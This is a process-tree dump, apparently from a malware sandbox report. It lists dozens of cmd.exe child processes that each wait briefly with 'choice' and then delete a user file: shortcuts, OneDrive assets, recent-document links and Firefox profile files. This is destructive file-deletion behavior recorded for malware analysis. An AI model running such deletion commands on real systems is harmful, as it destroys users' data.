-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml"2⤵PID:2064
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13496
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml"2⤵PID:280
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14252
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\alertIcon.png"2⤵PID:2308
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13592
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppBlue.png"2⤵PID:2396
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13380
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorBlue.png"2⤵PID:4984
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13208
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorWhite.png"2⤵PID:968
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13372
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppWhite.png"2⤵PID:3516
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13868
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AutoPlayOptIn.png"2⤵PID:4680
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14056
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppBlue.png"2⤵PID:4260
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:10936
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppWhite.png"2⤵PID:3684
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14740
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Error.png"2⤵PID:1432
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15300
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ErrorPage.html"2⤵PID:1016
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13752
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMHeroToast.png"2⤵PID:1996
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13224
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMLockedFileToast.png"2⤵PID:3452
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15092
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMScanExclusionToast.png"2⤵PID:4620
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14812
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LoadingPage.html"2⤵PID:4112
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13040
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\OneDriveLogo.png"2⤵PID:3204
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15268
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaCritical.png"2⤵PID:3752
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14136
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaError.png"2⤵PID:5104
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14200
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaNearing.png"2⤵PID:1460
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14096
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\TestSharePage.html"2⤵PID:5140
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14232
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt"2⤵PID:5176
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13744
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Warning.png"2⤵PID:5188
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14088
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-100.png"2⤵PID:5208
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13200
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-125.png"2⤵PID:5236
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13632
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-150.png"2⤵PID:5248
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13336
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-200.png"2⤵PID:5296
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13944
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-400.png"2⤵PID:5312
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14648
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-100.png"2⤵PID:5336
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13920
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-125.png"2⤵PID:5348
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14324
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-150.png"2⤵PID:5360
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14452
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-200.png"2⤵PID:5372
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15056
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-400.png"2⤵PID:5384
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14624
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-100.png"2⤵PID:5396
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13844
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-125.png"2⤵PID:5408
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14796
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-150.png"2⤵PID:5420
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14932
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-200.png"2⤵PID:5432
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:7676
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-400.png"2⤵PID:5452
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15048
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-100.png"2⤵PID:5472
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14756
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-125.png"2⤵PID:5492
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14804
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-150.png"2⤵PID:5512
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14128
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-200.png"2⤵PID:5532
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14908
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-400.png"2⤵PID:5552
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14780
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-100.png"2⤵PID:5572
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14720
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-125.png"2⤵PID:5592
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14064
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-150.png"2⤵PID:5620
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14608
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-200.png"2⤵PID:5640
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14020
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-400.png"2⤵PID:5660
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15008
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-100.png"2⤵PID:5676
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14180
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-125.png"2⤵PID:5692
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14820
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-150.png"2⤵PID:5708
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14148
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-200.png"2⤵PID:5732
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14468
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-400.png"2⤵PID:5756
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:12744
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml"2⤵PID:5780
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15080
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SettingsCache.txt"2⤵PID:5800
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:5704
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk"2⤵PID:5812
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13704
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk"2⤵PID:5824
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13284
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk"2⤵PID:5836
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14916
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk"2⤵PID:5848
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13996
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Are.docx.lnk"2⤵PID:5860
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15064
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Files.docx.lnk"2⤵PID:5872
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14316
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Opened.docx.lnk"2⤵PID:5884
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14460
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Recently.docx.lnk"2⤵PID:5904
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14004
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\These.docx.lnk"2⤵PID:5916
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14656
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk"2⤵PID:5928
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14012
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk"2⤵PID:5940
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14400
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\images\blurrect.png"2⤵PID:5952
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14732
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk"2⤵PID:5964
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14764
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk"2⤵PID:5976
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14680
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk"2⤵PID:5988
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14876
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk"2⤵PID:6000
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14224
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk"2⤵PID:6012
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15524
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk"2⤵PID:6024
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14552
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Windows Terminal.lnk"2⤵PID:6044
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15000
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Windows Terminal.lnk"2⤵PID:6056
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15148
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk"2⤵PID:6072
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13360
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk"2⤵PID:6084
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13004
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - NetworkStatus.lnk"2⤵PID:6120
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14104
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk"2⤵PID:6136
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15072
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\06 - SystemAbout.lnk"2⤵PID:1976
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14036
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk"2⤵PID:564
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14664
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\08 - PowerAndSleep.lnk"2⤵PID:1876
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14828
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk"2⤵PID:4996
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14860
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\10 - AppsAndFeatures.lnk"2⤵PID:6148
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13616
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586187409503304.txt"2⤵PID:6180
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14240
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586189861131157.txt"2⤵PID:6196
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14788
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586198240052432.txt"2⤵PID:6212
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14048
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools.lnk"2⤵PID:6236
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14476
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\File Explorer.lnk"2⤵PID:6252
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13760
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk"2⤵PID:6272
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14884
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk"2⤵PID:6288
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14852
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ydz6lw8g.default-release\AlternateServices.txt"2⤵PID:6308
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15040
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ydz6lw8g.default-release\pkcs11.txt"2⤵PID:6328
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14592
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ydz6lw8g.default-release\SiteSecurityServiceState.txt"2⤵PID:6348
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14216
-
-
-
